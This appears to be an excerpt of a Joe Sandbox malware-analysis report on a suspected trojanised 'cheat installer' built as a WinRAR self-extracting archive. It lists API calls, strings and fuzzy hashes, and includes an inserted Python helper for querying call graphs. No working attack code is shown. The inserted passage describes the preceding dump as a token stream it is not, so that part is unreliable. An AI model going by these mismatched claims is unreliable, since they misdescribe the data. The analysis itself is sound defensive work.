CRT start-up and runtime (7ff754572d6c, 7ff75457c438, 7ff75457bf2c): __scrt_acquire_startup_lock / __scrt_initialize_crt / __scrt_release_startup_lock / __scrt_dllmain_crt_thread_attach / _RTC_Initialize; 7ff7545732d3 GetStartupInfoW; 7ff75457c2f9 GetModuleFileNameA; 7ff754573480 InitializeSListHead; 7ff754572ecd abort; 7ff754580b78 GetEnvironmentStringsW; 7ff754580ba6 and 7ff754580c10 WideCharToMultiByte; 7ff754580c54 FreeEnvironmentStringsW; 7ff75457d97e RtlAllocateHeap; 7ff75457f398 EnterCriticalSection; 7ff75457d911 RtlRestoreThreadPreferredUILanguages; 7ff75457d931 and 7ff75457d440 GetLastError; 7ff75457d4b0 and 7ff75457d4c6 SetLastError (__vcrt_uninitialize_ptd); 7ff75457d90c __free_lconv_mon

7ff754570754 and callees (entered from the CRT start-up code): 7ff754569481 OleInitialize; 7ff7545694cd SHGetMalloc; 7ff75457096e GetCommandLineW; 7ff7545709f9 OpenFileMappingW; 7ff754570a19 MapViewOfFile; 7ff754570a3f UnmapViewOfFile MapViewOfFile; 7ff754570ac7 UnmapViewOfFile; 7ff754570ad0 CloseHandle; 7ff754570b93 SetEnvironmentVariableW GetLocalTime; 7ff754553e28 swprintf; 7ff754570c18 SetEnvironmentVariableW GetModuleHandleW LoadIconW; 7ff75456b014 LoadBitmapW; 7ff754570c87 DialogBoxParamW; 7ff754570ce6 Sleep; 7ff754570d06 and 7ff754570d1f DeleteObject; 7ff75456fe24 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject; 7ff754570d60 CloseHandle; 7ff75456950a OleUninitialize

7ff75455dfd0 and callees: 7ff75455dff4 GetModuleHandleW; 7ff75455e026 and 7ff75455e053 GetProcAddress; 7ff75455e3c3 CreateFileW; 7ff75455e403 SetFilePointer; 7ff75455e41c ReadFile; 7ff75455e4f0 CloseHandle; 7ff75455e53e CompareStringW; 7ff7545551c8 GetVersionExW; 7ff75455e74b AllocConsole; 7ff75455e755 GetCurrentProcessId AttachConsole; 7ff75455e778 GetStdHandle WriteConsoleW Sleep FreeConsole; 7ff75455e7b9 ExitProcess

Resource and GDI/GDI+ helpers: 7ff754568624 FindResourceW; 7ff75456864f SizeofResource; 7ff754568669 LoadResource; 7ff754568682 LockResource; 7ff754568697 GlobalAlloc; 7ff7545686b8 GlobalLock; 7ff7545686f6 GdipAlloc; 7ff75456875a GdipCreateHBITMAPFromBitmap; 7ff754568789 GlobalUnlock; 7ff754568792 GlobalFree; 7ff75456b04e GetObjectW; 7ff75456b092 and 7ff75456b0bf DeleteObject; 7ff754568504 and 7ff754568590 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC; 7ff75455a43c GetModuleHandleW FindResourceW

7ff7545703e0 and callees: 7ff75454250c and 7ff754570556 SetDlgItemTextW

File and string helpers: 7ff754552320 GetStdHandle ReadFile GetLastError GetLastError GetFileType; 7ff754552890 and 7ff754552c01 SetFilePointer; 7ff7545528b8 and 7ff754552c1e GetLastError; 7ff75455da48 and 7ff7545613f4 CompareStringW; 7ff754560bbc MultiByteToWideChar; 7ff754560f68 WideCharToMultiByte; 7ff75455e845 SetThreadExecutionState; 7ff75455e95f ReleaseSemaphore; 7ff754555312 __vcrt_InitializeCriticalSectionEx

Delay-load helper (7ff75457154b / 7ff754571900 _com_raise_error, DloadProtectSection, DloadReleaseSectionWriteAccess): 7ff754571624 GetModuleHandleW; 7ff75457163e, 7ff754571653 and 7ff754571b1b GetProcAddress; 7ff754571a3d LoadLibraryExA; 7ff754571ab4 FreeLibrary; 7ff7545716a4 VirtualQuery GetSystemInfo; 7ff75457183a VirtualProtect; 7ff754571998, 7ff754571a8b and 7ff754571b67 RaiseException; 7ff754571a54 and 7ff754571b30 GetLastError; 7ff7545720f0 _com_error::_com_error

Error and exception paths: 7ff754577904 _invalid_parameter_noinfo_noreturn (31 API calls); 7ff754572320 _handle_error (8 API calls); 7ff75454b664 and 7ff7545740b4 / 7ff7545740db RtlPcToFileHeader RaiseException (Concurrency::cancel_current_task); 7ff754562056 std::bad_alloc::bad_alloc; 7ff7545426b4 BuildCatchObjectHelperInternal
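The call-graph dump above is a flat token stream ("node-id address [labels]" definitions interleaved with "a->b" edges), which is awkward to read but easy to query once parsed. The following is an added example, not code from Joe Sandbox or its IDA plugin: it parses that token format (the format is inferred from the dump, so the parsing rules are an assumption), indexes which graph nodes call which API or symbol, and answers the question an analyst actually has, namely which root function can reach a sensitive call such as VirtualProtect or LoadLibraryExA and through which chain. The embedded SAMPLE is a trimmed excerpt of the delay-load region of the edge list above; the whole dump parses the same way.

```python
"""Parse a Joe Sandbox IDA-plugin call-graph dump and ask which root reaches API X, and how.

Assumed token format (inferred from the dump, not the plugin's own definition):
  "<id> <12-hex-digit address> [labels...]"  defines a node,
  "<id>-><id>"                               is a call edge,
  anything else annotates the most recently defined node.
"""
import re
from collections import defaultdict, deque
from dataclasses import dataclass, field

ADDR_RE = re.compile(r"^[0-9a-f]{12}$")
EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
NOISE = {"API", "calls", "library"}   # from annotations such as "33 API calls" / "2 library calls"


@dataclass
class Node:
    nid: int
    addr: int
    labels: list = field(default_factory=list)

    def symbols(self):
        """Labels that name a function (Win32 import or an IDA-recognised CRT symbol)."""
        return [l for l in self.labels if not l.isdigit() and l not in NOISE]


def parse_graph(text):
    nodes, edges, cur = {}, set(), None
    toks = text.split()
    i = 0
    while i < len(toks):
        t = toks[i]
        m = EDGE_RE.match(t)
        if m:
            edges.add((int(m.group(1)), int(m.group(2))))
        elif t.isdigit() and i + 1 < len(toks) and ADDR_RE.match(toks[i + 1]):
            cur = int(t)
            nodes[cur] = Node(cur, int(toks[i + 1], 16))
            i += 1                      # the address token belongs to this node
        elif cur is not None:
            nodes[cur].labels.append(t)
        i += 1
    return nodes, edges


def symbol_index(nodes):
    """Symbol name -> sorted addresses of the nodes that call it."""
    idx = defaultdict(set)
    for n in nodes.values():
        for s in n.symbols():
            idx[s].add(n.addr)
    return {s: sorted(a) for s, a in idx.items()}


def roots_reaching(nodes, edges, symbol):
    """Addresses of graph roots (no incoming edge) from which a call to `symbol` is reachable."""
    preds = defaultdict(set)
    for a, b in edges:
        preds[b].add(a)
    targets = [n.nid for n in nodes.values() if symbol in n.symbols()]
    seen, queue = set(targets), deque(targets)
    while queue:                        # reverse BFS over the edge list
        for p in preds[queue.popleft()]:
            if p not in seen:
                seen.add(p)
                queue.append(p)
    return sorted(nodes[n].addr for n in seen if n in nodes and not preds[n])


def call_path(nodes, edges, root_addr, symbol):
    """Shortest call chain (as addresses) from `root_addr` to a node calling `symbol`; [] if none."""
    succ = defaultdict(set)
    for a, b in edges:
        succ[a].add(b)
    start = next((n.nid for n in nodes.values() if n.addr == root_addr), None)
    parent, queue = {start: None}, deque([start])
    while queue:
        cur = queue.popleft()
        if cur in nodes and symbol in nodes[cur].symbols():
            path = []
            while cur is not None:      # walk the BFS parents back to the root
                path.append(nodes[cur].addr)
                cur = parent[cur]
            return path[::-1]
        for s in succ[cur]:
            if s not in parent:
                parent[s] = cur
                queue.append(s)
    return []


# Excerpt of the edge list in this report (the delay-load helper region around 7ff754571900),
# trimmed to the nodes needed here; the rest of the dump parses the same way.
SAMPLE = (
    "25861 7ff75457154b 25862 7ff7545714a2 25861->25862 25864 7ff754571900 25862->25864 "
    "25890 7ff754571558 25864->25890 25867 7ff75457198b 25868 7ff754571868 "
    "DloadReleaseSectionWriteAccess 6 API calls 25867->25868 25869 7ff754571998 RaiseException "
    "25868->25869 25871 7ff7545719b4 25872 7ff754571a3d LoadLibraryExA 25871->25872 "
    "25877 7ff754571abd 25871->25877 25878 7ff754571b1b GetProcAddress 25877->25878 "
    "25891 7ff75457156e 25890->25891 25892 7ff7545715d3 25890->25892 25906 7ff754571604 "
    "25891->25906 25892->25867 25892->25871 25907 7ff754571573 25906->25907 25913 7ff7545717d8 "
    "25907->25913 25915 7ff7545717fa DloadProtectSection 25913->25915 25914 7ff75457183a "
    "VirtualProtect 25915->25914 25918 7ff7545716a4 VirtualQuery GetSystemInfo 25915->25918"
)

if __name__ == "__main__":
    nodes, edges = parse_graph(SAMPLE)
    for sym, addrs in sorted(symbol_index(nodes).items()):
        print(f"{sym:32s}", " ".join(f"{a:x}" for a in addrs))
    for sym in ("VirtualProtect", "LoadLibraryExA"):
        for root in roots_reaching(nodes, edges, sym):
            chain = " -> ".join(f"{a:x}" for a in call_path(nodes, edges, root, sym))
            print(f"{sym} reachable from {root:x}: {chain}")
```

Run against the full dump, the same three queries turn a page of node IDs into a short list of "which entry point reaches which API", which is what you need when deciding whether the VirtualProtect / LoadLibraryExA / GetProcAddress cluster is the compiler's delay-load helper (as the DloadProtectSection and DloadReleaseSectionWriteAccess labels indicate here) or something the packer added.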
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
• Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
Similarity
• API ID: Item$_invalid_parameter_noinfo_noreturn$Message$DialogText$ButtonChecked$FileSend$ErrorLast$CloseFindFocusLoadStringView$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleLineMappingParamShellSleepTickTranslateUnmapWindow
• String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
• API String ID: 3303814210-2702805183
• Opcode ID: d4d5e23c9f4b261c4c19f8130fee5323a8a410ce77bf06ef946c8267d964b253
• Instruction ID: b875569144687d97f3c24a63b94654fd35c1ee8e793f5d5d36167985a637787a
• Opcode Fuzzy Hash: d4d5e23c9f4b261c4c19f8130fee5323a8a410ce77bf06ef946c8267d964b253
• Instruction Fuzzy Hash: EBD27162A096C291FA21FF27E8F42F9A361FF85780FD84136D94D466A6DE3CE544C720
                                                                                  APIs
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task$ButtonCheckedFileMove$DialogItemPathTemp
                                                                                  • String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
                                                                                  • API String ID: 1830998149-3916287355
                                                                                  • Opcode ID: e8e04c62f54770bedbb7c0e18cc69a2eaec3cac7609a0d283ef696123d8756e1
                                                                                  • Instruction ID: 83597fed61a698be5cec28bd01fdab254e7c0f81fd4850730face6613894e1fd
                                                                                  • Opcode Fuzzy Hash: e8e04c62f54770bedbb7c0e18cc69a2eaec3cac7609a0d283ef696123d8756e1
                                                                                  • Instruction Fuzzy Hash: B613A172B04B82A5EB10EF66D8E42EC67A1FB40398FD80535DA1D17AD9DF38E585C360

                                                                                  APIs
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: File$EnvironmentHandleVariableView$_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDeleteDirectoryModuleObjectProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
                                                                                  • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                  • API String ID: 1048086575-3710569615
                                                                                  • Opcode ID: a2d1f56a0ea0f115fb5c545e7d969dd7b349b6d85002bdedd461fc6b968f04a4
                                                                                  • Instruction ID: d4d84aca52a22be71ef4025fbaf0d496db53db59a88c6c8fe62bbbad14d3cba4
                                                                                  • Opcode Fuzzy Hash: a2d1f56a0ea0f115fb5c545e7d969dd7b349b6d85002bdedd461fc6b968f04a4
                                                                                  • Instruction Fuzzy Hash: 6B127761A1878295FB10AF26E8E52BDF3A1FF84794F984131DA5D47AA5DF3CE244C320

                                                                                  APIs
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: Window$Rect$ItemText$ByteCharClientLongMetricsMultiSystemWideswprintf
                                                                                  • String ID: $%s:$CAPTION
                                                                                  • API String ID: 1936833115-404845831
                                                                                  • Opcode ID: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
                                                                                  • Instruction ID: 1a202c29a249c8db9990b78725d0014a3de2dd91470826dfddd2d514551b4150
                                                                                  • Opcode Fuzzy Hash: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
                                                                                  • Instruction Fuzzy Hash: DB91F732B1864186E714EF2AE8A06BDE7A1FB84784F885535EE4D57B58DF3CE805CB10

                                                                                  APIs
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                                                                  • String ID: PNG
                                                                                  • API String ID: 541704414-364855578
                                                                                  • Opcode ID: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
                                                                                  • Instruction ID: c632dfba5da006371187eca26800bb5ef0f8519ceb321a1d1b9c6a04ff75e671
                                                                                  • Opcode Fuzzy Hash: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
                                                                                  • Instruction Fuzzy Hash: EE410A25A1AA4292FE54AF5794A4379B3A0BF88BD0F9C4435DE0D473A4EF7DE4488720
                                                                                  APIs
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                  • String ID: __tmp_reference_source_
                                                                                  • API String ID: 3668304517-685763994
                                                                                  • Opcode ID: c95adfe0dddff1d952a1755b735b07641f6b8a796b48e1e69593c56425167c21
                                                                                  • Instruction ID: e836918cd87a775964bd514a8cd19a51b0c40aeff2939b913321ec73d052ed21
                                                                                  • Opcode Fuzzy Hash: c95adfe0dddff1d952a1755b735b07641f6b8a796b48e1e69593c56425167c21
                                                                                  • Instruction Fuzzy Hash: A7E2BA62A086C252EA64EF26E1E03FEE761FB81784F984131EB9D076A5DF3CE455C710
                                                                                  APIs
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                  • String ID: CMT
                                                                                  • API String ID: 3668304517-2756464174
                                                                                  • Opcode ID: d27e10a47ab199182401eb8f629d16e0782fa570b7d722cbddcdfe00517a4b91
                                                                                  • Instruction ID: 0be1a67a0cf8a2e59348ab034db9d60469057a45eb68ca64454867185dc0acca
                                                                                  • Opcode Fuzzy Hash: d27e10a47ab199182401eb8f629d16e0782fa570b7d722cbddcdfe00517a4b91
                                                                                  • Instruction Fuzzy Hash: 66E2EE22F0868696EB18EF66D4A03FDA7A1FB45384F980035DB5E4B696DF7CE154C320

                                                                                  APIs
                                                                                  Similarity
                                                                                  • API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
                                                                                  • String ID:
                                                                                  • API String ID: 474548282-0
                                                                                  • Opcode ID: e946e08dc8eba9ecab1b1533132c2bb6995f9a4699fd30eb303f74d9a567b386
                                                                                  • Instruction ID: b3c3b85b7b07d0a8fea7461175f13c70dba3f112a07c7c23dc0ce8632436cff4
                                                                                  • Opcode Fuzzy Hash: e946e08dc8eba9ecab1b1533132c2bb6995f9a4699fd30eb303f74d9a567b386
                                                                                  • Instruction Fuzzy Hash: 0761D662A0864281EA11EF26E8D02BDA361FB857B4F945331FABD07AD9DF3CD544C710

4050 7ff7545467df-7ff7545467e6 4047->4050 4048->4022 4056 7ff754546828-7ff754546839 4048->4056 4050->4045 4050->4047 4057 7ff75454683b-7ff75454684e 4056->4057 4058 7ff754546854 call 7ff75457220c 4056->4058 4057->3860 4057->4058 4058->4022
Strings
Memory Dump Source
• Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
• Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
Similarity
• API ID:
• String ID: CMT
• API String ID: 0-2756464174
• Opcode ID: 589854a86694341a55c69b07c8121abed16d2d53b78a965ac968b8bdafdd2d04
• Instruction ID: 664aad1a093bca371b54e9ab74cf0dd1b7c99146fc0b6dbb31f6661748e5e420
• Opcode Fuzzy Hash: 589854a86694341a55c69b07c8121abed16d2d53b78a965ac968b8bdafdd2d04
• Instruction Fuzzy Hash: FD42BE22F0868296EB18EF76C1A13FDB7A0AB11744F980136DB5E5B696DF3CE558C310

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
• Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
Similarity
• API ID: _invalid_parameter_noinfo_noreturn$Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadModulePointerReadSleepStringSystemVersionWrite
• String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
• API String ID: 1496594111-2013832382
• Opcode ID: 468c4a7f069b7598ff125167d5f4f846522f64d48354b40e84144950afa66450
• Instruction ID: d7f15725ad6101325c78df3831694dd9c0a0acff89d676260a091e1b8d1de47c
• Opcode Fuzzy Hash: 468c4a7f069b7598ff125167d5f4f846522f64d48354b40e84144950afa66450
• Instruction Fuzzy Hash: 00321E31A09B8295FB21AF62E8A01E9B3A4FF44354FE80236DA4D47765EF3CD255C760
APIs
  • Part of subcall function 00007FF754558E58: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF754558F8D
• _snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF754559F75
• _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF75455A42F
• _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF75455A435
  • Part of subcall function 00007FF754560BBC: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF754560B44), ref: 00007FF754560BE9
Strings
Memory Dump Source
• Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
• Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
Similarity
• API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
• String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
• API String ID: 3629253777-3268106645
• Opcode ID: d5e184d1739c57cd0f07290b4b435b9f8b6515e69c147f3d5d8e6c96380bb7e8
• Instruction ID: 6644983dcb0b57c4684b5d2380818795936753300e591fb451570e34cc82e074
• Opcode Fuzzy Hash: d5e184d1739c57cd0f07290b4b435b9f8b6515e69c147f3d5d8e6c96380bb7e8
• Instruction Fuzzy Hash: D862AF62B1968295EB10EF26D4E82FDA3A1FB40784FC84131EA4D47695EF3CE945C760

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
• Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
Similarity
• API ID: DloadSection$AccessExceptionProtectRaiseReleaseWrite$ErrorLastLibraryLoad
• String ID: H
• API String ID: 3432403771-2852464175
• Opcode ID: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
• Instruction ID: 545a80340e03340c1be3b0d4d7aad7440d50489c2d68279d62da3bb5b95fc877
• Opcode Fuzzy Hash: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
• Instruction Fuzzy Hash: 00916A32A05B128AFB10EF66D8946A8B3B5FB08B98F9C4135DE0E17754EF38E545C360

Control-flow Graph

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_invalid_parameter_noinfo_noreturn
                                                                                  • String ID: .exe$.inf$Install$p
                                                                                  • API String ID: 1054546013-3607691742
                                                                                  • Opcode ID: c93eaa18019216a85c3e78fe71fcdc46f058aac99f8069240fe2a65e9d023974
                                                                                  • Instruction ID: 529d3a16a4009bb4580dcee78c75933a2263acfc91a57075a2eb89a0aa801d97
                                                                                  • Opcode Fuzzy Hash: c93eaa18019216a85c3e78fe71fcdc46f058aac99f8069240fe2a65e9d023974
                                                                                  • Instruction Fuzzy Hash: 83C18223F18642A5FA10EF27D9E417DA7A2AF857C0F884031EA4D476A9DF3CE851C324

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: ButtonChecked$Message$DialogDispatchItemPeekShowTranslateWindow
                                                                                  • String ID:
                                                                                  • API String ID: 4119318379-0
                                                                                  • Opcode ID: c58ef51af4c11ae469b78d40ba7290d4e9656f32b0895ce54e4debee0d1a06d9
                                                                                  • Instruction ID: cbc7ca4a3d1bebabb031db773e295ef2209c262cf895501b4fadb552b9b3d509
                                                                                  • Opcode Fuzzy Hash: c58ef51af4c11ae469b78d40ba7290d4e9656f32b0895ce54e4debee0d1a06d9
                                                                                  • Instruction Fuzzy Hash: B541B332B5464286F700EF63EC60BA973A0EB85B99F881136DD0E07B95CE7DE4458764
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 3668304517-0
                                                                                  • Opcode ID: 39ec4a74e49df8f56e32db411fcadac0f579ee807ced4d6d4e98762d9bdd5929
                                                                                  • Instruction ID: b9f382329a5f5d91a178eb67aaf9e7c6def9f1dc749257854406edfe070544d2
                                                                                  • Opcode Fuzzy Hash: 39ec4a74e49df8f56e32db411fcadac0f579ee807ced4d6d4e98762d9bdd5929
                                                                                  • Instruction Fuzzy Hash: 2212B363F0874285EB10EF6AD4A42BDA371EB457A8F940231EA5D1BAD9DF3CD585C320

                                                                                  Control-flow Graph

